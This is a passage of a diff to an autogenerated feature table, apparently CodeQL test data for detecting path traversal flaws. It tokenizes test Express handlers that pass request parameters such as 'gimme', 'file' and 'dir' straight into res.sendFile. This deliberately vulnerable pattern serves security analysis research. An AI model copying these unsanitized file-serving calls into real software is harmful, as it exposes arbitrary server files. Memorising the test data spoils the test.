data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:54 | process.cwd | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:54 | process.cwd | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | exceptional return of process.cwd() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | exceptional return of process.cwd() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | exceptional return of process.cwd() | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | exceptional return of process.cwd() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | exceptional return of process.cwd() | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | process.cwd() | CalleeFlexibleAccessPath | res.sendFile | | autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | process.cwd() | InputAccessPathFromCallee | 1.root | | autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | process.cwd() | InputArgumentIndex | 1 | @@ -11002,6 +85969,51 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | process.cwd() | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | | autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | process.cwd() | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:56 | process.cwd() | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:52:13:54 | cwd | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:52:13:54 | cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:52:13:54 | cwd | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:52:13:54 | cwd | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:52:13:54 | cwd | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:14 | res.sendfile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:14 | res.sendfile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:14 | res.sendfile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:14 | res.sendfile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:14 | res.sendfile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | exceptional return of res.sen ... wd() }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | exceptional return of res.sen ... wd() }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | exceptional return of res.sen ... wd() }) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | exceptional return of res.sen ... wd() }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | exceptional return of res.sen ... wd() }) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | res.sen ... wd() }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | res.sen ... wd() }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | res.sen ... wd() }) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | res.sen ... wd() }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:3:15:59 | res.sen ... wd() }) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:7:15:14 | sendfile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:7:15:14 | sendfile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:7:15:14 | sendfile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:7:15:14 | sendfile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:7:15:14 | sendfile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:18 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:18 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:18 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:24 | req.param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:24 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:24 | req.param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:24 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:24 | req.param | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | exceptional return of req.param("gimme") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | exceptional return of req.param("gimme") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | exceptional return of req.param("gimme") | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | exceptional return of req.param("gimme") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | exceptional return of req.param("gimme") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | req.param("gimme") | CalleeFlexibleAccessPath | res.sendfile | | autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | req.param("gimme") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | req.param("gimme") | contextFunctionInterfaces | | @@ -11010,6 +86022,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | req.param("gimme") | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | req.param("gimme") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:15:16:15:33 | req.param("gimme") | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:15:20:15:24 | param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:20:15:24 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:20:15:24 | param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:20:15:24 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:20:15:24 | param | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:15:26:15:32 | "gimme" | CalleeFlexibleAccessPath | req.param | | autogenerated/TaintedPath/tainted-sendFile.js:15:26:15:32 | "gimme" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:15:26:15:32 | "gimme" | contextFunctionInterfaces | | @@ -11026,6 +86043,36 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:15:36:15:58 | { root: ... cwd() } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:15:36:15:58 | { root: ... cwd() } | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:15:36:15:58 | { root: ... cwd() } | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:41 | root | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:41 | root | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:41 | root | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:41 | root | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:41 | root | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:38:15:56 | root: process.cwd() | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:50 | process | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:50 | process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:50 | process | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:50 | process | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:50 | process | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:54 | process.cwd | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:54 | process.cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:54 | process.cwd | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:54 | process.cwd | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:54 | process.cwd | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | exceptional return of process.cwd() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | exceptional return of process.cwd() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | exceptional return of process.cwd() | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | exceptional return of process.cwd() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | exceptional return of process.cwd() | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | process.cwd() | CalleeFlexibleAccessPath | res.sendfile | | autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | process.cwd() | InputAccessPathFromCallee | 1.root | | autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | process.cwd() | InputArgumentIndex | 1 | @@ -11035,6 +86082,51 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | process.cwd() | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | | autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | process.cwd() | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:15:44:15:56 | process.cwd() | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:15:52:15:54 | cwd | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:15:52:15:54 | cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:15:52:15:54 | cwd | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:15:52:15:54 | cwd | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:15:52:15:54 | cwd | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:14 | res.sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:14 | res.sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:14 | res.sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:14 | res.sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:14 | res.sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | exceptional return of res.sen ... ir") }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | exceptional return of res.sen ... ir") }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | exceptional return of res.sen ... ir") }) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | exceptional return of res.sen ... ir") }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | exceptional return of res.sen ... ir") }) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | res.sen ... ir") }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | res.sen ... ir") }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | res.sen ... ir") }) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | res.sen ... ir") }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:3:18:61 | res.sen ... ir") }) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:7:18:14 | sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:7:18:14 | sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:7:18:14 | sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:7:18:14 | sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:7:18:14 | sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:18 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:18 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:18 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:24 | req.param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:24 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:24 | req.param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:24 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:24 | req.param | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | exceptional return of req.param("file") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | exceptional return of req.param("file") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | exceptional return of req.param("file") | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | exceptional return of req.param("file") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | exceptional return of req.param("file") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | req.param("file") | CalleeFlexibleAccessPath | res.sendFile | | autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | req.param("file") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | req.param("file") | contextFunctionInterfaces | | @@ -11043,6 +86135,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | req.param("file") | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | req.param("file") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:18:16:18:32 | req.param("file") | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:18:20:18:24 | param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:20:18:24 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:20:18:24 | param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:20:18:24 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:20:18:24 | param | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:18:26:18:31 | "file" | CalleeFlexibleAccessPath | req.param | | autogenerated/TaintedPath/tainted-sendFile.js:18:26:18:31 | "file" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:18:26:18:31 | "file" | contextFunctionInterfaces | | @@ -11059,6 +86156,36 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:18:35:18:60 | { root: ... dir") } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:18:35:18:60 | { root: ... dir") } | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:18:35:18:60 | { root: ... dir") } | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:40 | root | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:40 | root | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:40 | root | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:40 | root | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:40 | root | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile 